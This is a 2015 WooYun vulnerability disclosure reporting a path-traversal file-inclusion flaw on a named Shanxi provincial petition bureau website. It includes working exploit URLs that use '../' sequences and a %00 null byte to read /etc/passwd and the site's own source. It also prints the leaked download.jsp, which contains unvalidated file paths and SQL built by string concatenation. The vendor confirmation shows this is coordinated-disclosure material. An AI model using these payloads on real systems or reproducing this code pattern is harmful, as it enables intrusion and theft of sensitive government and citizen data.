当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091036

漏洞标题:某省信访局文件包含获取敏感信息

相关厂商:cncert国家互联网应急中心

漏洞作者: covertops

提交时间:2015-01-13 11:35

修复时间:2015-02-27 11:36

公开时间:2015-02-27 11:36

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-16: 厂商已经确认,细节仅向厂商公开
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-02-27: 细节向公众公开

简要描述:

详细说明:

山西信访局http://www.xfsx.gov.cn
漏洞URL为:
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk,140117

QQ20150110-1@2x.png


QQ20150110-3@2x.png


但是%00后面的不是已经截断了么?
http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../../../../../../etc/passwd%00.apk包含失败

QQ20150110-2@2x.png


http://www.xfsx.gov.cn/mag/util/download.jsp?path=../../../../../mag/util/download.jsp%00.apk,140117
download.jsp文件内容如下:

<%@ page contentType="text/html; charset=gb2312"%>
<%@ page language="java" import="java.util.*,java.io.*"%>
<%@ page language="java" import="org.genius.data.ConfigParse" %>
<%@ page import="java.text.SimpleDateFormat" %>
<%@ page import="com.bwzy.coke.util.ParamsKeyUtil" %>
<%@ page import="org.springframework.context.ApplicationContext" %>
<%@ page import="org.springframework.context.support.ClassPathXmlApplicationContext" %>
<%@ page import="org.genius.data.IDataConfig" %>
<%@ page import="java.sql.SQLException" %>
<%@ page import="java.sql.ResultSet" %>
<%
    //¼Ç¼ÇëÇó¿ªÊ¼Ê±¼ä
    Date startdate=new Date();
    String nowTime = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(startdate);//
    //¼Ç¼¿Í»§¶Ë·ÃÎʵÄurlÐÅÏ¢
    String requestURL=request.getLocalAddr() + ":" + request.getLocalPort() + request.getRequestURI() + "?" + request.getQueryString();
    //»ñÈ¡·þÎñÀàÐÍ
    String businesstype = request.getParameter(ParamsKeyUtil.URL_PARAMS_KEY_BUSINESSTYPE);
    String type=request.getParameter(ParamsKeyUtil.URL_PARAMS_KEY_TYPE);
	request.setCharacterEncoding("gb2312");
	String pathFolder = new String(request.getParameter("path")) ;
	String[] fileName = pathFolder.split(",");
	String PathHead = ConfigParse.getFilePath();
	String folderL1 = fileName[1].substring(0,2);
	String folderL2 = fileName[1].substring(2,4);
	String folderL3 = fileName[1].substring(4,6);
	String realPath = PathHead + "/" + folderL1 + "/" + folderL2 + "/" + folderL3 + "/" + fileName[0];
	String realPathFix = new String(realPath.getBytes("iso-8859-1"),"gbk");
	File file = null;
	try{
		file = new File(realPathFix);
		FileInputStream fis = new FileInputStream(file);
		BufferedInputStream bis = new BufferedInputStream(fis);
		OutputStream os = response.getOutputStream();
    	response.setContentType("application/octet-stream");
	    response.setHeader("Content-disposition", "attachment; filename=" 
	    		+ new String(file.getName().getBytes("GBK"),"iso-8859-1"));
		response.addHeader( "Content-Length",""   +  file.length());
        ApplicationContext context = new ClassPathXmlApplicationContext(
                "applicationContext.xml");
        IDataConfig myData = (IDataConfig) context.getBean("dataConfigProxy");
        myData.init();
         ResultSet resultSet=null;
        int downnum=0;
        int id=0;
        boolean result=false;
        try {
            myData.openConnection();
            myData.beginTransaction();
            String sql1 ="select id,downnum from clientmanager where download='"+request.getParameter("path")+";'";
            System.out.println(sql1);
            resultSet=myData.executeQuery(sql1);
            while (resultSet.next()){
                downnum= Integer.parseInt(resultSet.getString("downnum"));
                System.out.println("ÏÂÔØ´ÎÊý"+downnum);
                id=resultSet.getInt("id");
            }
            if(downnum>=0){
                downnum++;
                String sql2 ="update clientmanager set downnum='" + downnum + "' where id='" + id + "'";
                myData.addBatch(sql2);
                if(myData.commit()){
                    result=true;
                }else{
                    result=false;
                }
            }
            System.out.println("ÊÇ·ñ²åÈë³É¹¦"+result);
            myData.endTransaction();
        } catch (SQLException e) {
            e.printStackTrace();
        }finally{
            myData.closeConnection();
        }
	    byte[] buffer = new byte[1024];
	    try{
 		   	while(bis.read(buffer) != -1){
 		   		os.write(buffer);
	    	}
		}catch(Exception e){}
		try{
			os.flush();
		}catch(Exception e){}
			bis.close();
			os=null;
		try{
 			response.flushBuffer();
		}catch(Exception e){}
        out = pageContext.pushBody();
		out.clear();
	}catch(Exception e){
		System.out.println("\""+realPathFix+"\" ÎļþÏÂÔØʧ°Ü");
		response.getWriter().print("ÏÂÔØʧ°Ü£¬Î´ÕÒµ½Ö¸¶¨×ÊÔ´.");
	}
%>


漏洞证明:

包含的话,信访局应该有不少上传附件的地方吧,没注册

修复方案:

对文件名进行校验

版权声明:转载请注明来源 covertops@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-16 16:48

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山西分中心,由其后续尝试协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论